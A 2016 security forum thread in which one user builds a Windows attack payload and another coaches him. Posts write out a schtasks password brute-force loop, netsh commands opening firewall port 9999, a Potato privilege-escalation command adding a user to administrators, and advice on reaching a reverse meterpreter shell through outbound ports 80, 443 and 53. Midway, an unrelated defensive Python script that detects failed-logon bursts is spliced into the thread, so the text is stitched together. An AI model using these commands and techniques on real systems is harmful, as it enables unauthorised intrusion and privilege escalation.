vailixi Posted May 21, 2016 So I wanted to make a payload which can be run without admin privileges and brute force the admin password by calling some program with system() that would require a password, until the password is found. My question is: what is the fastest command you can run from the Windows command line that will actually require an administrator password? Also, how do I get an error message back for conditional logic that will tell me if I got the right password? Any ideas?
digininja Posted May 22, 2016 You'll be very limited in what apps you can use because you'll need to pick one that takes the password on the command line. From that list, it shouldn't really matter what you pick, as the first thing the app should do is check permissions, so they will all fail at about the same speed.
vailixi Posted May 29, 2016 (edited) Digininja, any chance you can help me with the syntax on this? I think I'm going to just go ahead and brute force a scheduled task that will open a port on the firewall. I'm not sure on the syntax for schtasks and netsh advfirewall. Here's what I was trying for, but my syntax is horribly wrong. Not really sure on the options. schtasks /Create /S %computername% /U %username% /P password /TN portopen /SC %time% /tr netsh advfirewall firewall add rule name="Open Port 9999" dir=in action=allow protocol=TCP localport=9999 Edited May 29, 2016 by vailixi
vailixi Posted May 29, 2016 (edited) Or maybe something like this: I keep getting syntax errors. I think I need escape characters, but I'm not really sure how to write out this command. schtasks /Create /S %computername% /RU %username% /RP password /SC ONCE /TN portopen /TR "netsh advfirewall firewall add rule name=Open Port 9999 dir=in action=allow protocol=TCP localport=9999 /ST 18:44" Edited May 29, 2016 by vailixi
digininja Posted May 29, 2016 Too complicated. Why not just do a dir, or even a command that doesn't exist? That means you don't have to pass loads of arguments to the command you are calling. And as a way to catch the password, put it in the comment; but having said that, I'm not sure if you can see other people's tasks, so that might not be any use. Just monitor the return code instead.
vailixi Posted May 29, 2016 I don't get that. Am I piping the password into dir somehow?
digininja Posted May 29, 2016 No, into the schtasks where it says password.
vailixi Posted May 29, 2016 (edited) OK, ok, that makes sense. LOL. I tried this: schtasks /Create /S %computername% /RU desktop/8alleale\me /RP password /SC ONCE /TN dirshow /TR dir /ST 13:30 Now I'm at least getting access denied instead of a syntax error. I tried this as well: schtasks /Create /S %computername% /RU %username% /RP password /SC ONCE /TN dirshow /TR dir /ST 13:30 Same this way: access denied. Is there something wrong with the way I'm getting the system and username? Edited May 29, 2016 by vailixi
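The loop discussed in the posts above (feeding candidate passwords to a command that validates credentials and reading its return code) leaves a trail on the host: every rejected guess is a failed credential validation, which Windows logs as Security event 4625 for the targeted account. The following is an added example, not code from this thread or from any tool it mentions, showing how a defender would pick that pattern out of an exported Security log. The pipe-delimited export format and every sample line are constructed for the example, and the assumption that a rejected schtasks /RP password produces a 4625 event for the account named in /RU is the example's assumption, not something the thread states.

```python
"""Flag accounts that accumulate many failed logons (Event ID 4625) in a
short window, the signature of a scripted password-guessing loop."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample export of Windows Security events, one record per line:
#   <ISO timestamp>|<EventID>|<TargetUserName>|<WorkstationName>|<LogonType>
# These lines are made up for the example; they are not real log data.
SAMPLE_LOG = """\
2016-05-29T13:30:01|4625|Administrator|DESKTOP-01|3
2016-05-29T13:30:03|4625|Administrator|DESKTOP-01|3
2016-05-29T13:30:05|4625|Administrator|DESKTOP-01|3
2016-05-29T13:30:07|4625|Administrator|DESKTOP-01|3
2016-05-29T13:30:09|4625|Administrator|DESKTOP-01|3
2016-05-29T13:30:11|4625|Administrator|DESKTOP-01|3
2016-05-29T13:31:00|4624|alice|DESKTOP-01|2
2016-05-29T13:45:00|4625|alice|DESKTOP-01|2
2016-05-29T14:10:00|4625|alice|DESKTOP-01|2
"""


def parse_line(line):
    """Split one exported record into a dict with typed fields."""
    ts, event_id, account, workstation, logon_type = line.strip().split("|")
    return {
        "time": datetime.fromisoformat(ts),
        "event_id": int(event_id),
        "account": account,
        "workstation": workstation,
        "logon_type": int(logon_type),
    }


def parse_log(text):
    """Parse every non-empty line of the export."""
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def detect_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Return {account: time} for each account whose failed logons (4625)
    reach `threshold` inside any sliding `window`; the time recorded is
    the attempt at which the threshold was first crossed."""
    recent = defaultdict(deque)  # account -> timestamps of recent failures
    flagged = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["event_id"] != 4625:
            continue  # only failures count; successes (4624) are ignored
        q = recent[ev["account"]]
        q.append(ev["time"])
        # Drop failures that have aged out of the window.
        while q and ev["time"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold and ev["account"] not in flagged:
            flagged[ev["account"]] = ev["time"]
    return flagged


if __name__ == "__main__":
    for account, when in detect_bursts(parse_log(SAMPLE_LOG)).items():
        print(f"possible password guessing against {account!r}; "
              f"threshold reached at {when.isoformat()}")
```

With the defaults (five failures within sixty seconds) the constructed log flags only Administrator, whose six failures arrive two seconds apart; alice's two failures are 25 minutes apart and stay under the threshold. The same sliding-window check works on any source that exposes account and timestamp per failure, so it applies whether the guesses go through schtasks, runas or a network logon.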
vailixi Posted June 5, 2016 Incidentally, I found this WPAD spoofing attack that seems to work rather well. Potato attack Potato source code on Github Syntax was something like this: Potato.exe -ip 192.168.1.9 -disable_exhaust true cmd "C:\\windows\\system32\\cmd.exe /k net localgroup administrator me add" This actually worked for adding my user to the administrators group. That's cool and all. I still don't have the password for netsh to open a port on the firewall though. Is there a way to just kill the firewall?
digininja Posted June 5, 2016 What is it you are actually trying to achieve? Your question is now deviating away from the original topic.
vailixi Posted June 5, 2016 Sorry, I'm pretty much trying to find new ways to actually get my payload to bypass the firewall and make a reverse connection reliably. I was using a reverse hop HTTP meterpreter and it seemed to work for a while.
digininja Posted June 5, 2016 I assume you've tried connecting out on ports 80, 443 and 53; it is rare that they are blocked outbound.